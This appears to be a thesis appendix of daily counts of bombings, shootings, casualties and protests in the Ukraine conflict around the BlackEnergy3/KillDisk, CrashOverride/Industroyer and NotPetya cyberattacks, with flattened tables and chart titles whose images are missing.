Table 1: Physical attributes of the war surrounding the dates of major cyberattacks: BlackEnergy3/KillDisk wounded/ wounded/ killed killed Date threats/ military civilians/ protests Numbere bombing open Personnel / politician d Date s firing policemen s -91 23-Sep-15 0 3 0 2 0 -90 24-Sep-15 1 2 8 3 0 -89 25-Sep-15 0 2 0 0 0 -88 26-Sep-15 0 0 0 0 1 -87 27-Sep-15 2 1 2 0 0 -86 28-Sep-15 3 1 0 1 0 -85 29-Sep-15 1 0 0 0 1 -84 30-Sep-15 2 2 0 0 1 -83 1-Oct-15 1 5 0 1 0 -82 2-Oct-15 3 0 1 1 1 -81 3-Oct-15 1 0 0 0 0 -80 4-Oct-15 2 4 0 0 0 -79 5-Oct-15 1 1 3 0 0 -78 6-Oct-15 2 4 0 0 0 -77 7-Oct-15 4 0 8 0 2 -76 8-Oct-15 2 0 0 1 0 -75 9-Oct-15 0 0 0 0 2 -74 10-Oct-15 2 0 0 0 1 -73 11-Oct-15 0 2 0 4 1 -72 12-Oct-15 1 3 0 8 0 -71 13-Oct-15 2 0 0 0 0 -70 14-Oct-15 2 0 0 0 0 -69 15-Oct-15 0 0 0 2 0 -68 16-Oct-15 1 1 1 0 0 -67 17-Oct-15 2 2 1 0 0 -66 18-Oct-15 2 4 0 0 0 -65 19-Oct-15 3 0 7 1 0 -64 20-Oct-15 3 0 2 1 1 -63 21-Oct-15 3 2 0 0 0 -62 22-Oct-15 4 3 1 0 0 -61 23-Oct-15 2 0 17 3 0 -60 24-Oct-15 3 1 1 0 1 -59 25-Oct-15 2 3 1 1 2 142
-58 26-Oct-15 1 1 2 0 0 -57 27-Oct-15 8 3 2 0 0 -56 28-Oct-15 2 2 5 0 1 -55 29-Oct-15 2 1 1 1 0 -54 30-Oct-15 3 0 2 0 0 -53 31-Oct-15 1 1 3 1 3 -52 1-Nov-15 6 5 2 2 0 -51 2-Nov-15 6 5 6 1 0 -50 3-Nov-15 2 3 3 1 0 -49 4-Nov-15 6 1 0 0 0 -48 5-Nov-15 5 14 0 0 0 -47 6-Nov-15 4 1 2 4 1 -46 7-Nov-15 3 2 0 0 2 -45 8-Nov-15 2 3 11 6 2 -44 9-Nov-15 2 22 7 1 0 -43 10-Nov-15 3 52 15 0 0 -42 11-Nov-15 2 5 1 0 0 -41 12-Nov-15 0 1 4 0 0 -40 13-Nov-15 3 3 9 2 0 -39 14-Nov-15 5 1 13 0 0 -38 15-Nov-15 4 4 12 0 0 -37 16-Nov-15 4 22 3 0 0 -36 17-Nov-15 5 2 0 0 0 -35 18-Nov-15 5 35 0 1 0 -34 19-Nov-15 2 34 1 0 0 -33 20-Nov-15 5 2 0 1 0 -32 21-Nov-15 2 1 3 1 1 -31 22-Nov-15 0 6 4 0 1 -30 23-Nov-15 3 38 2 0 0 -29 24-Nov-15 1 2 12 0 0 -28 25-Nov-15 4 20 0 0 0 -27 26-Nov-15 2 23 0 0 0 -26 27-Nov-15 3 4 0 0 0 -25 28-Nov-15 0 3 1 0 0 -24 29-Nov-15 0 8 0 0 0 -23 30-Nov-15 4 0 0 0 0 -22 1-Dec-15 7 4 2 3 3 -21 2-Dec-15 3 3 0 0 0 -20 3-Dec-15 3 1 0 0 0 -19 4-Dec-15 1 12 25 0 1 -18 5-Dec-15 2 4 0 0 0 -17 6-Dec-15 4 11 8 3 1 -16 7-Dec-15 3 2 2 0 0 143
-15 8-Dec-15 2 4 5 0 0 -14 9-Dec-15 2 40 13 0 0 -13 10-Dec-15 8 30 12 1 0 -12 11-Dec-15 4 50 3 0 1 -11 12-Dec-15 2 32 0 0 0 -10 13-Dec-15 2 15 0 0 0 -9 14-Dec-15 2 25 0 0 0 -8 15-Dec-15 2 31 12 0 0 -7 16-Dec-15 3 12 0 0 0 -6 17-Dec-15 2 5 0 0 0 -5 18-Dec-15 7 64 3 0 0 -4 19-Dec-15 2 40 0 0 0 -3 20-Dec-15 1 120 0 0 0 -2 21-Dec-15 21 79 0 1 0 -1 22-Dec-15 5 20 0 1 0 0 23-Dec-15 2 51 0 1 0 1 24-Dec-15 3 5 0 0 0 2 25-Dec-15 2 61 19 0 0 3 26-Dec-15 8 66 5 0 0 4 27-Dec-15 7 22 0 1 0 5 28-Dec-15 2 40 0 0 0 6 29-Dec-15 4 32 0 0 0 7 30-Dec-15 0 31 0 0 0 8 31-Dec-15 1 42 0 0 0 9 1-Jan-16 1 2 2 0 0 10 2-Jan-16 0 1 2 0 0 11 3-Jan-16 0 13 0 0 0 12 4-Jan-16 1 22 0 0 0 13 5-Jan-16 4 21 0 0 0 14 6-Jan-16 9 72 0 0 0 15 7-Jan-16 2 42 1 1 0 16 8-Jan-16 2 30 0 0 0 17 9-Jan-16 2 11 6 3 0 18 10-Jan-16 0 31 3 0 0 19 11-Jan-16 14 35 0 0 0 20 12-Jan-16 4 16 0 0 0 21 13-Jan-16 2 70 0 0 0 22 14-Jan-16 35 60 2 0 0 23 15-Jan-16 2 2 0 0 0 24 16-Jan-16 8 36 0 0 0 25 17-Jan-16 1 48 3 0 0 26 18-Jan-16 4 47 0 0 0 27 19-Jan-16 2 21 1 0 0 144
28 20-Jan-16 1 3 6 0 0 29 21-Jan-16 2 69 2 0 0 30 22-Jan-16 2 21 0 0 0 31 23-Jan-16 1 38 0 0 0 32 24-Jan-16 2 29 0 0 0 33 25-Jan-16 1 12 1 0 0 34 26-Jan-16 3 66 1 0 0 35 27-Jan-16 3 40 0 0 0 36 28-Jan-16 2 71 28 0 0 37 29-Jan-16 2 38 0 0 1 38 30-Jan-16 2 3 4 0 0 39 31-Jan-16 3 104 0 2 0 40 1-Feb-16 9 12 2 0 0 41 2-Feb-16 2 62 0 0 0 42 3-Feb-16 5 55 0 0 0 43 4-Feb-16 4 37 34 0 0 44 5-Feb-16 10 130 11 1 0 45 6-Feb-16 4 69 16 0 0 46 7-Feb-16 2 65 1 0 0 47 8-Feb-16 1 63 0 0 0 48 9-Feb-16 9 22 0 2 0 49 10-Feb-16 11 102 0 4 0 50 11-Feb-16 21 6 1 0 0 51 12-Feb-16 1 1 2 0 1 52 13-Feb-16 2 69 7 0 0 53 14-Feb-16 110 71 5 0 0 54 15-Feb-16 5 6 0 0 0 55 16-Feb-16 205 60 1 0 1 56 17-Feb-16 6 1 4 3 1 57 18-Feb-16 4 55 0 0 0 58 19-Feb-16 3 3 0 0 0 59 20-Feb-16 1 18 0 0 1 60 21-Feb-16 5 5 14 0 1 61 22-Feb-16 2 94 2 0 0 62 23-Feb-16 183 85 0 3 0 63 24-Feb-16 3 66 0 0 1 64 25-Feb-16 5 35 1 0 0 65 26-Feb-16 4 17 1 1 0 66 27-Feb-16 10 42 0 0 0 67 28-Feb-16 8 68 5 2 0 68 29-Feb-16 1 54 22 0 0 69 1-Mar-16 12 55 3 0 0 70 2-Mar-16 7 11 2 0 0 145
71 3-Mar-16 36 57 0 0 0 72 4-Mar-16 77 50 7 2 0 73 5-Mar-16 1 5 2 0 0 74 6-Mar-16 12 52 0 0 0 75 7-Mar-16 6 58 0 0 0 76 8-Mar-16 1 6 0 0 0 77 9-Mar-16 5 49 0 0 0 78 10-Mar-16 3 31 0 0 0 79 11-Mar-16 5 75 1 0 0 80 12-Mar-16 6 108 0 0 0 81 13-Mar-16 5 48 0 0 0 82 14-Mar-16 7 14 0 0 0 83 15-Mar-16 0 24 0 0 0 84 16-Mar-16 4 17 3 0 0 85 17-Mar-16 1 2 0 0 1 86 18-Mar-16 10 52 0 0 0 87 19-Mar-16 10 32 1 0 0 88 20-Mar-16 2 1 0 0 0 89 21-Mar-16 4 6 3 0 0 90 22-Mar-16 19 44 4 1 0 91 23-Mar-16 18 72 13 0 0
146
Table 2: Physical attributes of the war surrounding the dates of major cyberattacks:
CrashOverride/Industroyer
wounded/ killed wounded/ Dates military killed Numbere bombings open personnel/ civilians/ d Date / threats firing policemen politicians protests -91 17-Sep-16 0 6 1 0 0 -90 18-Sep-16 2 24 1 0 0 -89 19-Sep-16 0 34 0 0 0 -88 20-Sep-16 31 15 0 0 0 -87 21-Sep-16 2 22 5 0 0 -86 22-Sep-16 2 20 0 0 0 -85 23-Sep-16 1 40 7 0 0 -84 24-Sep-16 0 3 1 1 0 -83 25-Sep-16 52 19 4 0 1 -82 26-Sep-16 4 42 3 0 0 -81 27-Sep-16 0 0 0 0 0 -80 28-Sep-16 2 26 3 0 0 -79 29-Sep-16 4 33 0 0 0 -78 30-Sep-16 2 36 2 0 0 -77 1-Oct-16 1 47 0 0 0 -76 2-Oct-16 1 49 3 0 0 -75 3-Oct-16 1 34 0 0 0 -74 4-Oct-16 5 68 0 0 0 -73 5-Oct-16 5 4 4 0 0 -72 6-Oct-16 3 4 0 0 0 -71 7-Oct-16 2 41 6 1 0 -70 8-Oct-16 4 50 0 0 2 -69 9-Oct-16 5 45 12 0 0 -68 10-Oct-16 6 48 15 0 0 -67 11-Oct-16 2 47 4 0 0 -66 12-Oct-16 28 19 9 0 0 -65 13-Oct-16 1 21 0 0 0 -64 14-Oct-16 6 44 2 0 0 -63 15-Oct-16 8 46 8 0 0 -62 16-Oct-16 4 62 1 1 0 -61 17-Oct-16 50 29 0 0 0 -60 18-Oct-16 18 35 2 0 0 -59 19-Oct-16 4 31 3 0 0 -58 20-Oct-16 7 45 0 1 0 147
-57 21-Oct-16 2 39 3 0 0 -56 22-Oct-16 2 34 0 0 0 -55 23-Oct-16 3 43 7 0 0 -54 24-Oct-16 2 65 7 0 0 -53 25-Oct-16 6 23 0 1 0 -52 26-Oct-16 5 43 20 1 1 -51 27-Oct-16 14 88 7 7 0 -50 28-Oct-16 3 56 8 1 0 -49 29-Oct-16 7 53 9 0 0 -48 30-Oct-16 3 71 0 0 0 -47 31-Oct-16 13 36 0 0 0 -46 1-Nov-16 5 27 0 1 0 -45 2-Nov-16 6 47 2 9 0 -44 3-Nov-16 65 35 4 0 0 -43 4-Nov-16 3 38 0 0 1 -42 5-Nov-16 3 47 6 1 0 -41 6-Nov-16 7 57 5 0 1 -40 7-Nov-16 8 50 4 0 1 -39 8-Nov-16 13 20 3 0 0 -38 9-Nov-16 8 54 7 1 0 -37 10-Nov-16 7 55 0 0 0 -36 11-Nov-16 8 57 5 0 0 -35 12-Nov-16 8 66 0 2 0 -34 13-Nov-16 4 35 0 0 0 -33 14-Nov-16 16 8 0 0 0 -32 15-Nov-16 7 37 8 0 1 -31 16-Nov-16 5 53 2 0 1 -30 17-Nov-16 3 57 1 0 0 -29 18-Nov-16 14 46 0 1 0 -28 19-Nov-16 7 18 0 2 0 -27 20-Nov-16 2 1 0 0 0 -26 21-Nov-16 2 1 0 0 0 -25 22-Nov-16 11 17 4 0 0 -24 23-Nov-16 6 30 0 0 0 -23 24-Nov-16 17 28 1 1 0 -22 25-Nov-16 0 37 0 0 0 -21 26-Nov-16 3 38 0 0 0 -20 27-Nov-16 1 37 6 0 0 -19 28-Nov-16 2 40 0 0 0 -18 29-Nov-16 3 25 3 0 0 -17 30-Nov-16 4 47 3 2 1 -16 1-Dec-16 2 43 4 0 0 -15 2-Dec-16 3 44 0 0 0 148
-14 3-Dec-16 6 26 0 0 0 -13 4-Dec-16 5 26 0 0 0 -12 5-Dec-16 5 26 2 0 0 -11 6-Dec-16 12 77 6 0 0 -10 7-Dec-16 13 22 17 0 0 -9 8-Dec-16 5 15 2 0 0 -8 9-Dec-16 2 31 0 0 0 -7 10-Dec-16 9 102 5 0 0 -6 11-Dec-16 12 109 3 0 0 -5 12-Dec-16 4 112 0 0 0 -4 13-Dec-16 4 15 0 0 0 -3 14-Dec-16 8 18 0 3 0 -2 15-Dec-16 2 17 1 0 0 -1 16-Dec-16 4 52 2 0 0 0 17-Dec-16 6 126 26 0 0 1 18-Dec-16 7 52 32 1 0 2 19-Dec-16 14 71 23 0 0 3 20-Dec-16 38 84 15 0 0 4 21-Dec-16 10 15 13 0 0 5 22-Dec-16 5 23 5 1 0 6 23-Dec-16 17 50 6 0 0 7 24-Dec-16 11 39 0 0 0 8 25-Dec-16 22 33 0 0 0 9 26-Dec-16 20 62 3 0 0 10 27-Dec-16 9 29 0 0 0 11 28-Dec-16 2 50 7 0 0 12 29-Dec-16 11 71 4 0 0 13 30-Dec-16 6 48 0 0 0 14 31-Dec-16 5 44 0 0 0 15 1-Jan-17 6 39 12 0 0 16 2-Jan-17 10 34 4 0 0 17 3-Jan-17 8 49 0 0 0 18 4-Jan-17 19 32 1 0 0 19 5-Jan-17 6 34 1 0 0 20 6-Jan-17 27 42 2 0 0 21 7-Jan-17 14 72 6 0 0 22 8-Jan-17 8 51 8 0 0 23 9-Jan-17 24 46 5 0 0 24 10-Jan-17 12 30 4 0 0 25 11-Jan-17 18 13 6 1 0 26 12-Jan-17 19 78 3 0 0 27 13-Jan-17 23 62 1 0 0 28 14-Jan-17 14 60 7 0 0 149
29 15-Jan-17 23 54 2 0 0 30 16-Jan-17 16 32 2 0 0 31 17-Jan-17 3 61 2 0 0 32 18-Jan-17 8 57 2 0 0 33 19-Jan-17 23 28 0 0 0 34 20-Jan-17 5 30 1 1 1 35 21-Jan-17 10 33 0 1 0 36 22-Jan-17 11 41 10 0 0 37 23-Jan-17 20 73 2 0 0 38 24-Jan-17 36 66 1 0 0 39 25-Jan-17 19 51 3 0 0 40 26-Jan-17 34 84 2 0 0 41 27-Jan-17 15 94 3 6 0 42 28-Jan-17 7 55 0 0 0 43 29-Jan-17 12 154 31 0 0 44 30-Jan-17 10 30 27 0 0 45 31-Jan-17 10 47 23 10 0 46 1-Feb-17 15 41 8 15 0 47 2-Feb-17 53 67 16 3 0 48 3-Feb-17 24 115 10 0 0 49 4-Feb-17 52 52 2 0 0 50 5-Feb-17 76 82 7 0 0 51 6-Feb-17 9 124 0 2 0 52 7-Feb-17 9 89 6 1 0 53 8-Feb-17 48 82 0 0 0 54 9-Feb-17 40 40 0 1 0 55 10-Feb-17 12 63 0 0 0 56 11-Feb-17 8 59 2 0 0 57 12-Feb-17 15 78 1 1 0 58 13-Feb-17 20 72 1 0 0 59 14-Feb-17 21 66 0 0 0 60 15-Feb-17 29 42 0 3 1 61 16-Feb-17 15 66 13 2 0 62 17-Feb-17 2 71 3 0 0 63 18-Feb-17 12 105 9 0 0 64 19-Feb-17 16 160 4 0 1 65 20-Feb-17 59 108 1 0 1 66 21-Feb-17 21 41 1 0 1 67 22-Feb-17 49 54 1 0 1 68 23-Feb-17 12 83 3 0 0 69 24-Feb-17 84 92 18 0 0 70 25-Feb-17 19 51 21 0 0 71 26-Feb-17 55 94 6 0 0 150
72 27-Feb-17 67 84 1 0 1 73 28-Feb-17 54 117 5 0 1 74 1-Mar-17 76 123 0 0 0 75 2-Mar-17 41 116 23 1 0 76 3-Mar-17 89 146 2 0 1 77 4-Mar-17 81 110 13 1 0 78 5-Mar-17 32 89 3 0 0 79 6-Mar-17 24 122 3 0 0 80 7-Mar-17 18 117 7 0 0 81 8-Mar-17 38 63 2 0 0 82 9-Mar-17 16 80 30 4 0 83 10-Mar-17 42 107 17 2 0 84 11-Mar-17 19 118 2 1 0 85 12-Mar-17 22 82 5 1 0 86 13-Mar-17 7 97 0 10 0 87 14-Mar-17 43 106 7 0 0 88 15-Mar-17 7 91 4 0 0 89 16-Mar-17 22 77 10 0 0 90 17-Mar-17 15 112 7 0 0
151
Table 3: Physical attributes of the war surrounding the dates of major cyberattacks:
NotPetya
wounded/ wounded/ killed Dates open killed Date Bombings military protests Numbered firing civilians/ personnel/ politicians policemen -92 27-Mar-17 102 58 11 0 0 -91 28-Mar-17 42 61 3 0 0 -90 29-Mar-17 90 1 5 2 0 -89 30-Mar-17 18 37 15 2 0 -88 31-Mar-17 8 94 10 0 0 -87 1-Apr-17 19 37 2 0 0 -86 2-Apr-17 12 32 1 0 0 -85 3-Apr-17 35 48 11 1 0 -84 4-Apr-17 2 54 5 0 0 -83 5-Apr-17 6 29 2 1 0 -82 6-Apr-17 57 48 5 2 0 -81 7-Apr-17 15 43 5 2 0 -80 8-Apr-17 11 59 4 0 0 -79 9-Apr-17 44 71 2 1 1 -78 10-Apr-17 14 108 5 3 1 -77 11-Apr-17 31 45 7 0 0 -76 12-Apr-17 9 61 3 0 0 -75 13-Apr-17 26 84 2 3 0 -74 14-Apr-17 6 45 2 0 0 -73 15-Apr-17 5 29 0 0 0 -72 16-Apr-17 3 32 0 0 0 -71 17-Apr-17 6 1 1 0 0 -70 18-Apr-17 4 35 2 0 0 -69 19-Apr-17 1 18 1 0 0 -68 20-Apr-17 13 48 10 0 0 -67 21-Apr-17 64 41 1 0 0 -66 22-Apr-17 3 45 0 0 0 -65 23-Apr-17 6 34 3 3 0 -64 24-Apr-17 41 21 1 6 0 -63 25-Apr-17 15 65 8 0 0 -62 26-Apr-17 22 49 7 0 0 -61 27-Apr-17 6 52 3 0 0 -60 28-Apr-17 6 72 8 0 0 152
-59 29-Apr-17 4 61 6 0 0 -58 30-Apr-17 7 54 8 0 0 -57 1-May-17 8 55 4 2 1 -56 2-May-17 4 63 8 0 0 -55 3-May-17 11 52 9 0 0 -54 4-May-17 12 58 10 0 0 -53 5-May-17 7 63 5 2 0 -52 6-May-17 3 45 5 0 0 -51 7-May-17 3 65 0 0 0 -50 8-May-17 2 42 0 0 0 -49 9-May-17 1 70 3 0 8 -48 10-May-17 6 37 1 0 2 -47 11-May-17 5 53 8 0 0 -46 12-May-17 4 54 3 1 0 -45 13-May-17 14 61 4 4 0 -44 14-May-17 9 49 6 0 0 -43 15-May-17 4 37 2 0 0 -42 16-May-17 7 5 0 0 1 -41 17-May-17 18 52 5 3 2 -40 18-May-17 28 40 3 0 0 -39 19-May-17 40 55 4 0 0 -38 20-May-17 10 48 7 0 0 -37 21-May-17 20 56 2 0 0 -36 22-May-17 13 59 9 1 0 -35 23-May-17 26 53 1 1 0 -34 24-May-17 8 61 2 2 0 -33 25-May-17 24 57 5 0 0 -32 26-May-17 19 61 2 0 0 -31 27-May-17 12 49 8 0 0 -30 28-May-17 41 48 7 11 0 -29 29-May-17 14 60 3 3 1 -28 30-May-17 16 44 6 1 0 -27 31-May-17 14 35 2 3 0 -26 1-Jun-17 11 28 0 2 0 -25 2-Jun-17 8 53 7 0 0 -24 3-Jun-17 4 58 7 0 0 -23 4-Jun-17 2 60 2 0 0 -22 5-Jun-17 11 77 7 1 0 -21 6-Jun-17 10 89 8 1 0 -20 7-Jun-17 17 71 17 0 0 -19 8-Jun-17 48 63 15 1 0 -18 9-Jun-17 12 71 1 2 1 -17 10-Jun-17 8 73 11 0 0 153
-16 11-Jun-17 43 67 6 0 0 -15 12-Jun-17 17 57 6 0 0 -14 13-Jun-17 30 52 8 2 0 -13 14-Jun-17 10 55 3 0 0 -12 15-Jun-17 9 50 1 1 0 -11 16-Jun-17 4 67 4 0 1 -10 17-Jun-17 19 66 5 0 0 -9 18-Jun-17 4 47 6 0 0 -8 19-Jun-17 8 4 4 1 0 -7 20-Jun-17 10 35 1 1 0 -6 21-Jun-17 2 3 2 0 0 -5 22-Jun-17 2 29 2 0 0 -4 23-Jun-17 5 48 9 1 0 -3 24-Jun-17 3 26 5 0 0 -2 25-Jun-17 3 23 1 0 0 -1 26-Jun-17 3 22 0 0 0 0 27-Jun-17 1 31 6 0 0 1 28-Jun-17 6 35 5 0 0 2 29-Jun-17 19 22 7 0 0 3 30-Jun-17 8 35 10 0 0 4 1-Jul-17 5 25 5 0 0 5 2-Jul-17 6 20 2 0 0 6 3-Jul-17 3 24 2 0 0 7 4-Jul-17 3 15 0 0 0 8 5-Jul-17 2 13 2 0 0 9 6-Jul-17 1 25 1 0 0 10 7-Jul-17 1 22 4 4 0 11 8-Jul-17 1 27 2 1 0 12 9-Jul-17 0 13 0 0 0 13 10-Jul-17 1 22 1 0 0 14 11-Jul-17 2 21 1 0 0 15 12-Jul-17 1 30 1 1 1 16 13-Jul-17 4 31 2 0 0 17 14-Jul-17 5 35 4 0 0 18 15-Jul-17 7 27 2 1 0 19 16-Jul-17 8 16 1 0 0 20 17-Jul-17 2 15 2 2 0 21 18-Jul-17 1 23 6 0 0 22 19-Jul-17 4 22 9 5 0 23 20-Jul-17 9 29 13 1 0 24 21-Jul-17 5 11 3 0 0 25 22-Jul-17 3 18 0 0 0 26 23-Jul-17 1 14 1 0 0 154
27 24-Jul-17 9 41 3 1 0 28 25-Jul-17 6 25 1 0 0 29 26-Jul-17 3 21 1 0 0 30 27-Jul-17 7 26 7 0 1 31 28-Jul-17 15 19 0 1 1 32 29-Jul-17 3 14 8 0 0 33 30-Jul-17 4 26 4 0 0 34 31-Jul-17 5 20 5 0 0 35 1-Aug-17 6 34 3 0 0 36 2-Aug-17 5 30 0 0 0 37 3-Aug-17 6 21 0 1 1 38 4-Aug-17 8 39 3 0 0 39 5-Aug-17 2 31 3 0 0 40 6-Aug-17 21 27 3 4 0 41 7-Aug-17 5 18 3 1 0 42 8-Aug-17 23 31 12 0 0 43 9-Aug-17 32 16 1 0 0 44 10-Aug-17 2 15 2 0 0 45 11-Aug-17 4 20 7 0 0 46 12-Aug-17 26 17 9 0 0 47 13-Aug-17 1 26 2 0 1 48 14-Aug-17 5 31 8 0 0 49 15-Aug-17 3 33 4 0 0 50 16-Aug-17 10 35 5 0 0 51 17-Aug-17 2 27 2 3 0 52 18-Aug-17 3 25 3 0 0 53 19-Aug-17 12 30 1 0 0 54 20-Aug-17 26 25 5 0 0 55 21-Aug-17 9 30 2 0 0 56 22-Aug-17 14 28 4 0 0 57 23-Aug-17 21 14 0 0 0 58 24-Aug-17 1 22 3 2 1 59 25-Aug-17 1 18 2 0 0 60 26-Aug-17 6 35 0 0 0 61 27-Aug-17 10 24 0 0 0 62 28-Aug-17 21 19 0 0 0 63 29-Aug-17 6 23 0 4 0 64 30-Aug-17 2 19 0 0 0 65 31-Aug-17 3 24 0 0 0 66 1-Sep-17 2 20 0 0 0 67 2-Sep-17 1 26 0 0 0 68 3-Sep-17 5 44 1 0 0 69 4-Sep-17 17 36 0 0 0 155
70 5-Sep-17 15 32 0 0 0 71 6-Sep-17 1 34 0 0 0 72 7-Sep-17 2 25 1 0 1 73 8-Sep-17 8 36 5 3 1 74 9-Sep-17 1 41 2 0 1 75 10-Sep-17 3 51 0 0 1 76 11-Sep-17 5 38 0 0 3 77 12-Sep-17 6 27 2 0 1 78 13-Sep-17 2 24 1 0 0 79 14-Sep-17 4 25 3 0 2 80 15-Sep-17 5 32 1 0 0 81 16-Sep-17 1 35 0 0 0 82 17-Sep-17 0 31 1 0 0 83 18-Sep-17 6 19 3 0 1 84 19-Sep-17 1 2 1 0 0 85 20-Sep-17 2 19 1 6 1 86 21-Sep-17 2 12 0 2 0 87 22-Sep-17 4 31 1 0 0 88 23-Sep-17 0 18 1 7 0 89 24-Sep-17 3 22 2 0 0 90 25-Sep-17 11 16 0 1 0 91 26-Sep-17 2 21 1 0 0 92 27-Sep-17 3 20 0 0 0
156
Bombings
157
158
159
160
161
Open Firing
162
163
164
165
166
Military Personnel and Policemen Killed or Wounded
167
168
169
170
171
Civilians and Politicians Killed or Wounded
172
173
174
175
176
Protests
177
178
179
180